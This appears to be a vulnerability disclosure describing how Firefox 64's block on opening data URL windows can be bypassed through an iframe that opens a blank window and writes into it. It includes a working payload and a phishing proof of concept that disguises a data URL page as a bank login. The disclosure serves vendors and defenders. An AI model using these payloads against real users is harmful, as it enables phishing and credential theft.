Title: Bypassing Mozilla Firefox Data URL blocking

Summary:

As data URLs was abused for bypassing Same-Origin-Policy or Phishing attacks in the past, They are limited in the newer versions of Mozilla Firefox.
It's possible to bypass the limits.

Tested On:

Mozilla Firefox 64.0(64-bit) On Windows 10
Mozilla Firefox 64.0.2(32-bit) On Windows 10
Other Versions may be affected.

Description:

We are not allowed to open a windows that its location is data URL and the type is executable (text/html,image/svg+xml,etc).

Here are examples:

This is allowed as its type is plain text:

var w=open("data:text/plain,Allowed");

This is not allowed as its type is executable(as it may be used for bypassing SOP or Phishing attacks):

var w=open("data:text/html,NotAllowed");

Note:If you get this message,allow the page to open pop-up windows:

There are two facts you should know:

1-We can't create a window that its location is an executable data URL, but we can create an iframe(or an embed) element that its location is an executable data URL.

2-If an iframe creates a blank window and writes to it by calling document.write() function,the blank window will inherit its location from the iframe(its parent).

We use these facts to bypass the limit:

1-We create an iframe that its location is an executable data URL.
2-The Iframe Creates a new blank window and writes the data to it.
3-All is done! Now we have an opened window that its location is an executable data URL.

Here is an example shows how we can bypass the limit:

<iframe src="data:text/html,<script>w=open('');w.document.write('');w.location.reload();w.alert('Location: '+w.location)</script>"></iframe>

this trick can be used for bypassing SOP or Phishing attacks.

Proof of Concept:

I've used the mentioned bypass and provided a Phishing exploit.
Here are the codes written in JavaScript language(You can open this file with your text editor to edit codes if you want):

1-We create an embed(or an iframe) element and set its location to the data URL:

data:text/html,https://bank.com/payments/login/...............<script>function OpenPhishingWindow(){...};CodesToCreateThePhishingLink;</script>

2-The embed element loads the data URl and executes JavaScript codes:

//CodesToCreateThePhishingLink:
document.body.innerHTML='<a href="https://bank.com/payments/login/" onclick="javascript:OpenPhishingWindow();return false;">Click to pay money!</a>'

3-JavaScript codes create a link element that its href is the trusted URL "https://bank.com/payments/login/":

and its onclick event is set to call OpenPhishingWindow() function that avoids pop-up blocking and opens the new window for phishing attack(by using the mentioned bypass):

<a href="https://bank.com/payments/login/" onclick="javascript:OpenPhishingWindow();return false;">Click to pay money!</a>

And:

function OpenPhishingWindow(){  var w=window.open('');  w.document.write(atob('PhishingPageCodesEncodedInBase64'));
				                w.document.close();     w.document.title='Bank Page';      }

Here is the link:

Click the link to open the phishing page.The opened page is similar to this:

As Many people don't know what data URLs are,attackers can use them to trick their victims that the page is trusted and steal their information.

Expected Result:

The opened window should not inherit its location from the parent if the location is a data URL.

Observed Result:

The opened window inherits data URL as its location from the parent and this can be abused.

About:

Author: 0xCoderMan
Email-Address: 0xc0derm4n@gmail.com